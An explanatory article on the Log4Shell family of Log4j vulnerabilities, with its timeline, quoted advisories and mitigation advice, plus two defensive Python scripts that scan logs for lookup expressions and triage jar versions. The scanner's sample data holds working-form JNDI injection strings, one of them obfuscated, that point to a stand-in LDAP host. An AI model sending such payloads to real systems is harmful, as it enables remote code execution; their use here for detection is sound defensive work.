Apache Log4j Vulnerability

What is Log4j Vulnerability?

Log4j is an Apache-developed logging library used in many Java-based applications, both enterprise apps and cloud services.

The Log4Shell vulnerability, tracked as CVE-2021-44228, is an unauthenticated remote code execution (RCE) flaw that allows complete system takeover on systems running Log4j 2.0-beta9 through 2.14.1. Apache released Log4j 2.15.0 to address it.

On 11 December 2021 the Microsoft Threat Intelligence Center stated that “The CVE-2021-44228 vulnerability allows unauthenticated remote code execution, and it is triggered when a specially crafted string provided by the attacker through a variety of different input vectors is parsed and processed by the Log4j 2 vulnerable component.”

However, that fix turned out to be incomplete in certain non-default configurations, and Apache had to release a further version.

Timeline of the Log4j Vulnerability

  • CVE-2021-44228 – On December 10, 2021, Apache released Log4j 2.15.0 for Java 8 users to address a remote code execution (RCE) vulnerability
  • CVE-2021-45046 – On December 13, 2021, Apache released Log4j 2.12.2 for Java 7 users and Log4j 2.16.0 for Java 8 users to address an RCE vulnerability
  • CVE-2021-45105 – On December 17, 2021, Apache released Log4j 2.17.0 for Java 8 users to address a denial-of-service (DoS) vulnerability

On 17 December 2021 CISA issued Emergency Directive (ED) 22-02, directing federal civilian agencies to take immediate action against the recently discovered vulnerabilities in Log4j software. The directive gives federal agencies until December 23 to report all internet-facing installations of the software on their networks to CISA.

Exploitation

The first vulnerability, CVE-2021-44228 (aka Log4Shell), was reported by the Alibaba Cloud security team on 24 November 2021. Once Chinese security researcher p0rz9 publicly disclosed the first proof-of-concept exploit, threat actors began scanning for systems vulnerable to this remotely exploitable flaw.

After the disclosure, nation-state actors from China, Iran, North Korea, and Turkey started abusing Log4Shell in their campaigns. Apache fixed the vulnerability in Log4j 2.15.0; however, that fix was incomplete in certain non-default configurations.

“It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, $${ctx:loginId}), attackers with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern, resulting in an information leak and remote code execution in some environments and local code execution in all environments; remote code execution has been demonstrated on macOS but no other tested environments.”

This second vulnerability is tracked as CVE-2021-45046 (Apache Log4j2 Thread Context Lookup Pattern vulnerable to remote code execution in certain non-default configurations) and is fixed in Log4j 2.16.0.

Apache then had to release yet another version (Log4j 2.17.0) to fix CVE-2021-45105, a high-severity denial-of-service (DoS) vulnerability in Log4j 2.16.0.

“Apache Log4j2 versions 2.0-alpha1 through 2.16.0 did not protect from uncontrolled recursion from self-referential lookups. When the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, $${ctx:loginId}), attackers with control over Thread Context Map (MDC) input data can craft malicious input data that contains a recursive lookup, resulting in a StackOverflowError that will terminate the process. This is also known as a DOS (Denial of Service) attack.”
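Both advisories above describe the same precondition: attacker-controlled input that reaches a Log4j lookup, whether a JNDI lookup (CVE-2021-45046) or a recursive one (CVE-2021-45105). The detection logic below, an added example rather than code from this article or from Apache, extracts balanced `${...}` expressions from untrusted log lines, records how deeply they nest, and rates them: `jndi` lookups as critical, nested lookups as high, and any other lookup in untrusted input as medium. The sample log lines are constructed for the example and use RFC 5737 documentation addresses; the `${lower:...}`/`${upper:...}` collapse is an assumption about one common way a lookup scheme gets split across nested expressions, not a complete catalogue.

```python
"""Scan untrusted text (access logs, headers, form fields) for Log4j 2 lookup expressions.

Added example for detection engineering; not code from the original article.
"""
import re
from dataclasses import dataclass
from typing import List, Tuple


@dataclass
class Lookup:
    raw: str    # the full ${...} text, braces included
    depth: int  # 1 = top level, 2 = nested inside another lookup, and so on


def extract_lookups(text: str) -> List[Lookup]:
    """Return every balanced ${...} expression in text, innermost first, with its nesting depth."""
    found: List[Lookup] = []
    open_at: List[int] = []  # start offsets of the '${' markers still waiting for their '}'
    i = 0
    while i < len(text):
        if text.startswith("${", i):
            open_at.append(i)
            i += 2
            continue
        if text[i] == "}" and open_at:
            start = open_at.pop()
            # depth = number of lookups still enclosing this one, plus one for itself
            found.append(Lookup(text[start:i + 1], len(open_at) + 1))
        i += 1
    return found


# Assumption: ${lower:x} / ${upper:x} evaluate to x, so collapsing them exposes a split scheme name.
CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}")
SCHEME = re.compile(r"\$\{\s*([A-Za-z]+)\s*:")


def collapse_case_lookups(raw: str) -> str:
    """Repeatedly replace ${lower:x} and ${upper:x} by x until nothing changes."""
    prev = None
    while prev != raw:
        prev = raw
        raw = CASE_LOOKUP.sub(lambda m: m.group(1), raw)
    return raw


def scan_line(line: str) -> List[Tuple[str, str, str]]:
    """Return (severity, reason, lookup_text) findings for one untrusted log line."""
    findings: List[Tuple[str, str, str]] = []
    for lk in extract_lookups(line):
        if lk.depth > 1:
            # Nesting in attacker-controlled input is itself a signal (recursion, obfuscation).
            findings.append(("high", "nested lookup", lk.raw))
            continue
        scheme = SCHEME.match(collapse_case_lookups(lk.raw))
        name = scheme.group(1).lower() if scheme else ""
        if name == "jndi":
            findings.append(("critical", "jndi lookup", lk.raw))
        else:
            # Log4j should never evaluate lookups from untrusted input; flag even non-JNDI ones.
            findings.append(("medium", "lookup in untrusted input", lk.raw))
    return findings


def scan_lines(lines: List[str]) -> List[Tuple[int, List[Tuple[str, str, str]]]]:
    """Return (line_index, findings) for every line that produced at least one finding."""
    return [(i, scan_line(ln)) for i, ln in enumerate(lines) if scan_line(ln)]


# Constructed sample access-log lines (documentation addresses, not real traffic).
LOG_LINES = [
    '203.0.113.7 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '203.0.113.8 - - "GET / HTTP/1.1" 200 "${jndi:ldap://198.51.100.23:1389/a}"',
    '203.0.113.9 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:ldap://198.51.100.23/a}"',
    '203.0.113.10 - - "GET /?q=${env:HOME} HTTP/1.1" 200 "curl/7.68.0"',
]

if __name__ == "__main__":
    for idx, findings in scan_lines(LOG_LINES):
        for severity, reason, raw in findings:
            print(f"line {idx}: [{severity}] {reason}: {raw}")
```

Run it over a real log source by replacing `LOG_LINES` with lines read from the file; the brace matching is what keeps the scanner from being fooled by a lookup split across nested expressions, and the per-line findings can be fed straight into a SIEM rule.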

Mitigation

CISA recommends the following:

  • Determine whether your organization’s products with Log4j are vulnerable.
  • Review Apache’s Log4j Security Vulnerabilities page for additional information.
  • Apply available patches immediately.
  • Conduct a security review to determine if there is a security concern or compromise.
  • Consider reporting compromises immediately to CISA and the FBI.
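The first recommendation, determining which installations are vulnerable, comes down to comparing each deployed Log4j 2 version against the ranges given in the timeline above. The script below is an added example, not code from CISA, Apache or this article: it parses Log4j version strings (including pre-releases such as 2.0-beta9), classifies a version against the three CVEs using the affected and fixed versions stated on this page, and triages a constructed inventory of `log4j-core-*.jar` paths. One assumption is encoded deliberately: the page gives no 2.12.x fix for CVE-2021-45105, so the Java 7 branch release 2.12.2 is treated as still exposed to that CVE.

```python
"""Classify Log4j 2 versions against CVE-2021-44228, CVE-2021-45046 and CVE-2021-45105.

Added example; affected/fixed versions follow the timeline on this page.
"""
import re
from typing import Dict, List, Optional, Tuple

STAGE_RANK = {"alpha": 0, "beta": 1, "rc": 2}
FINAL_STAGE = 3  # a release without a pre-release tag sorts after any alpha/beta/rc of it

VERSION_RE = re.compile(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-(alpha|beta|rc)(\d*))?")


def parse_version(text: str) -> Tuple[int, int, int, int, int]:
    """Turn '2.0-beta9' into a tuple that orders correctly against '2.0' and '2.14.1'."""
    m = VERSION_RE.fullmatch(text.strip())
    if not m:
        raise ValueError(f"unrecognised Log4j version string: {text!r}")
    major, minor, patch, stage, n = m.groups()
    base = (int(major), int(minor), int(patch or 0))
    if stage:
        return base + (STAGE_RANK[stage], int(n or 0))
    return base + (FINAL_STAGE, 0)


# (CVE, first affected, last affected, fix on the 2.12.x branch shipped for Java 7 users)
# The page lists 2.12.2 as the Java 7 fix for the first two CVEs and none for the third,
# so 2.12.2 is treated as exposed to CVE-2021-45105 (assumption taken from the page's silence).
CVES = [
    ("CVE-2021-44228", "2.0-beta9", "2.14.1", "2.12.2"),
    ("CVE-2021-45046", "2.0-beta9", "2.15.0", "2.12.2"),
    ("CVE-2021-45105", "2.0-alpha1", "2.16.0", None),
]


def exposed_cves(version: str) -> List[str]:
    """Return the CVE ids from the table that still apply to the given Log4j 2 version."""
    v = parse_version(version)
    on_2_12_branch = v[:2] == (2, 12)
    hits: List[str] = []
    for cve, first_bad, last_bad, branch_fix in CVES:
        if not (parse_version(first_bad) <= v <= parse_version(last_bad)):
            continue
        if on_2_12_branch and branch_fix and v >= parse_version(branch_fix):
            continue  # backported fix on the Java 7 branch
        hits.append(cve)
    return hits


# Only log4j-core carries the vulnerable lookup code; log4j-api jars are ignored here.
JAR_NAME = re.compile(r"log4j-core-(\d+\.\d+(?:\.\d+)?(?:-(?:alpha|beta|rc)\d*)?)\.jar$")


def version_from_jar_path(path: str) -> Optional[str]:
    """Extract the version from a conventionally named log4j-core jar path, else None."""
    m = JAR_NAME.search(path)
    return m.group(1) if m else None


def triage_inventory(paths: List[str]) -> Dict[str, List[str]]:
    """Map each recognised log4j-core jar path to the CVEs its version is exposed to."""
    report: Dict[str, List[str]] = {}
    for p in paths:
        ver = version_from_jar_path(p)
        if ver is None:
            continue  # shaded/renamed copies need manual inspection, not a filename check
        report[p] = exposed_cves(ver)
    return report


# Constructed sample inventory (hypothetical paths, not real hosts).
SAMPLE_JARS = [
    "/opt/app-a/lib/log4j-core-2.14.1.jar",
    "/opt/app-b/lib/log4j-core-2.15.0.jar",
    "/opt/app-c/lib/log4j-core-2.12.2.jar",
    "/opt/app-d/lib/log4j-core-2.17.0.jar",
    "/opt/app-e/lib/log4j-api-2.17.0.jar",
]

if __name__ == "__main__":
    for path, cves in triage_inventory(SAMPLE_JARS).items():
        print(f"{path}: {', '.join(cves) if cves else 'not exposed to the listed CVEs'}")
```

A filename check is only the first pass: fat jars, vendored copies and appliances that embed Log4j without a `log4j-core-<version>.jar` on disk will not show up in `triage_inventory`, which is why the script skips unrecognised paths rather than reporting them as safe.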
